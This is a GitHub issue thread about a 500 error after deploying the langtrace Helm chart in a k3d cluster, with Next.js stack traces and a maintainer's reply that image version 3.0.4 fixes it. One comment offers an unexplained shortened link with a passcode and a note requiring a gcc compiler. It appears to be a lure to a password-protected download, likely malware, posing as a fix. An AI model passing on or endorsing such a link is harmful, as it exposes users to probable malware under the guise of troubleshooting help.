### ISSUE TITLE
Issue with deployment in k3d cluster

### ISSUE THREAD

**Issue by FeU-aKlos** [Scale3-Labs/langtrace-helm-chart#11]
Case:
Deploying the helm chart in k3d cluster. Port-forward the service using kubectl an internal server error (500) is return if localhost:3000 is accessed in the browser.
![grafik](https://github.com/user-attachments/assets/23321ec1-7a4a-4b82-8069-ff09918ca78f)

Checking the logs of the langtrace-app-... leads to the following output:

```
TypeError: Cannot convert undefined or null to object
    at Function.keys (<anonymous>)
    at buildEnvironmentVariablesFrom (/app/node_modules/next/dist/server/web/sandbox/context.js:101:30)
    at createProcessPolyfill (/app/node_modules/next/dist/server/web/sandbox/context.js:115:14)
    at Object.extend (/app/node_modules/next/dist/server/web/sandbox/context.js:233:31)
    at Object.extend (/app/node_modules/next/dist/compiled/edge-runtime/index.js:1:705022)
    at new VM (/app/node_modules/next/dist/compiled/edge-runtime/index.js:1:712370)
    at new EdgeVM (/app/node_modules/next/dist/compiled/edge-runtime/index.js:1:704959)
    at createModuleContext (/app/node_modules/next/dist/server/web/sandbox/context.js:227:21)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async getModuleContext (/app/node_modules/next/dist/server/web/sandbox/context.js:396:71)
Error [ERR_HTTP_HEADERS_SENT]: Cannot append headers after they are sent to the client
    at ServerResponse.appendHeader (node:_http_outgoing:740:11)
    at /app/node_modules/next/dist/compiled/next-server/app-page.runtime.prod.js:16:23731
    at _Headers.forEach (node:internal/deps/undici/undici:2345:22)
    at w (/app/node_modules/next/dist/compiled/next-server/app-page.runtime.prod.js:16:23713)
    at R (/app/node_modules/next/dist/compiled/next-server/app-page.runtime.prod.js:12:83072)
    at nq (/app/node_modules/next/dist/compiled/next-server/app-page.runtime.prod.js:12:69672)
    at n1 (/app/node_modules/next/dist/compiled/next-server/app-page.runtime.prod.js:12:81755)
    at AsyncLocalStorage.run (node:async_hooks:346:14)
    at Timeout._onTimeout (/app/node_modules/next/dist/compiled/next-server/app-page.runtime.prod.js:12:87775)
    at listOnTimeout (node:internal/timers:573:17) {
  code: 'ERR_HTTP_HEADERS_SENT',
  digest: '2546314909'
}
```

The helm chart is deployed with the default values.

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by darshit-s3** [comment]
Hi @FeU-aKlos , this issue was with the newly released docker image, this as been fixed.
You can pull the latest image again or version `3.0.4`
